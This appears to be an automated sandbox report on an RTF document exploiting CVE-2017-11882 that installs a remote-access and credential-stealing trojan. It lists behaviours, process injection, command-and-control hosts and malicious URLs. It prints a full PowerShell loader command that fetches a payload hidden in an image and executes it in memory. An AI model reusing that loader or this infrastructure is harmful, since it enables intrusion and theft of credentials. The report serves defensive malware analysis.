                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0060468A push 2000604Dh; ret 2_2_00604A19
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0060BF99 push eax; retn 0060h 2_2_0060C1F9
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00225924 push 3401D860h; iretd 8_2_0022592D
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00222D7D pushad ; ret 8_2_00222D81
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00222DAD pushfd ; ret 8_2_00222D91
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00222DAD push ebx; ret 8_2_00222DEA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00222D82 pushfd ; ret 8_2_00222D91
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00457186 push ecx; ret 9_2_00457199
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0045E55D push esi; ret 9_2_0045E566
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00457AA8 push eax; ret 9_2_00457AC6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00434EB6 push ecx; ret 9_2_00434EC9

                Persistence and Installation Behavior

                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File dump: ~WRD0000.tmp.0.dr
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00406EEB ShellExecuteW,URLDownloadToFileW,9_2_00406EEB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,9_2_0041AADB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,9_2_0041CBE1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0040F7E2 Sleep,ExitProcess,9_2_0040F7E2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,9_2_0041A7D9
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 599735
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 600000
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 600000
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 484
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2508
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4730
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1596
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Window / User API: threadDelayed 9806
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3440 Thread sleep time: -240000s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3728 Thread sleep time: -60000s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3696 Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3764 Thread sleep count: 4730 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3764 Thread sleep count: 1596 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3800 Thread sleep time: -60000s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3804 Thread sleep time: -4611686018427385s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3804 Thread sleep time: -599735s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3804 Thread sleep time: -1200000s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3804 Thread sleep time: -600000s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3744 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3856 Thread sleep count: 147 > 30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3856 Thread sleep time: -441000s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3856 Thread sleep count: 9806 > 30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3856 Thread sleep time: -29418000s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,9_2_0040928E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,9_2_0041C322
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,9_2_0040C388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,9_2_004096A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,9_2_00408847
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00407877 FindFirstFileW,FindNextFileW,9_2_00407877
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0044E8F9 FindFirstFileExA,9_2_0044E8F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,9_2_0040BB6B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,9_2_00419B86
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,9_2_0040BD72
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,9_2_00407CD2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API call chain: ExitProcess graph end nodegraph_9-48955
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00434A8A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,9_2_0041CBE1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00443355 mov eax, dword ptr fs:[00000030h]9_2_00443355
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_004120B2 GetProcessHeap,HeapFree,9_2_004120B2
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00434BD8 SetUnhandledExceptionFilter,9_2_00434BD8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_0043503C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00434A8A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_0043BB71

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara match File source: Process Memory Space: powershell.exe PID: 3628, type: MEMORYSTR
                Source: Yara match File source: Process Memory Space: powershell.exe PID: 3732, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[obfuscated encoded string, truncated in the report]'
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 459000
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 471000
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 477000
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 478000
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 479000
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 47E000
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 9_2_00412132
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00419662 mouse_event,9_2_00419662
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\someimportantmeetingsgoing.vBS"
                Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[obfuscated encoded string, truncated in the report]'
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CSEDR/022/322.731.532.581//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00434CB6 cpuid 9_2_00434CB6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: EnumSystemLocalesW,9_2_0045201B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: EnumSystemLocalesW,9_2_004520B6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,9_2_00452143
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoW,9_2_00452393
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: EnumSystemLocalesW,9_2_00448484
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,9_2_004524BC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoW,9_2_004525C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,9_2_00452690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoW,9_2_0044896D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoA,9_2_0040F90C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: IsValidCodePage,GetLocaleInfoW,9_2_00451D58
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: EnumSystemLocalesW,9_2_00451FD0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_004489D7 GetSystemTimeAsFileTime,9_2_004489D7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0041B69E GetUserNameW,9_2_0041B69E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00449210 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,9_2_00449210
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                Source: Yara match File source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 8.2.powershell.exe.42feb20.1.unpack, type: UNPACKEDPE
                Source: Yara match File source: 8.2.powershell.exe.42feb20.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 00000009.00000002.891483132.0000000000581000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000008.00000002.375410076.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: Process Memory Space: powershell.exe PID: 3732, type: MEMORYSTR
                Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 3844, type: MEMORYSTR
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 9_2_0040BA4D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 9_2_0040BB6B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: \key3.db 9_2_0040BB6B

                Remote Access Functionality

                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-GT4655
                Source: Yara match File source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 8.2.powershell.exe.42feb20.1.unpack, type: UNPACKEDPE
                Source: Yara match File source: 8.2.powershell.exe.42feb20.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 00000009.00000002.891483132.0000000000581000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000008.00000002.375410076.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: Process Memory Space: powershell.exe PID: 3732, type: MEMORYSTR
                Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 3844, type: MEMORYSTR
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: cmd.exe 9_2_0040569A
                [Technique matrix; columns: Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact]
[Behavior graph. ID: 1520534; Sample: SecuriteInfo.com.Exploit.CV...; Startdate: 27/09/2024; Architecture: WINDOWS; Score: 100]
Process chain: WINWORD.EXE -> EQNEDT32.EXE -> wscript.exe -> powershell.exe -> powershell.exe -> RegAsm.exe
Network contacts: EQNEDT32.EXE -> 185.235.137.223 (port 80, AFRARASAIR, Iran); powershell.exe -> ia601706.us.archive.org, 207.241.227.96 (port 443, INTERNET-ARCHIVEUS, United States); RegAsm.exe -> camzeroconnect.duckdns.org, 192.3.101.29 (port 14645, AS-COLOCROSSINGUS, United States; uses dynamic DNS services)

Source | Detection | Scanner | Label
SecuriteInfo.com.Exploit.CVE-2017-11882.123.22759.7388.rtf | 50% | ReversingLabs | Document-RTF.Exploit.CVE-2017-11882
SecuriteInfo.com.Exploit.CVE-2017-11882.123.22759.7388.rtf | 100% | Avira | TR/AVI.Obfuscated.vhsxu

Source | Detection | Scanner | Label
C:\Users\user\Desktop\~WRD0000.tmp | 100% | Avira | EXP/CVE-2017-11882.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{07782794-9C99-45A3-9EF6-DEC334E5B758}.tmp | 100% | Avira | EXP/CVE-2017-11882.Gen

No Antivirus matches

No Antivirus matches

Source | Detection | Scanner | Label
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
http://ocsp.entrust.net03 | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
http://geoplugin.net/json.gp | 0% | URL Reputation | safe
http://geoplugin.net/json.gp/C | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://nuget.org/nuget.exe | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
http://crl.entrust.net/2048ca.crl0 | 0% | URL Reputation | safe
Name | IP | Active | Malicious | Reputation
camzeroconnect.duckdns.org | 192.3.101.29 | true | true | unknown
ia601706.us.archive.org | 207.241.227.96 | true | true | unknown

Name | Malicious | Reputation
camzeroconnect.duckdns.org | true | unknown
http://185.235.137.223/220/RDESC.txt | true | unknown
https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg | true | unknown
http://185.235.137.223/220/someimportantmeetingsgoing.tIF | true | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
207.241.227.96 | ia601706.us.archive.org | United States | 7941 | INTERNET-ARCHIVEUS | true
192.3.101.29 | camzeroconnect.duckdns.org | United States | 36352 | AS-COLOCROSSINGUS | true
185.235.137.223 | unknown | Iran (ISLAMIC Republic Of) | 202391 | AFRARASAIR | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1520534
Start date and time: 2024-09-27 13:59:12 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 50s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed: 12
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
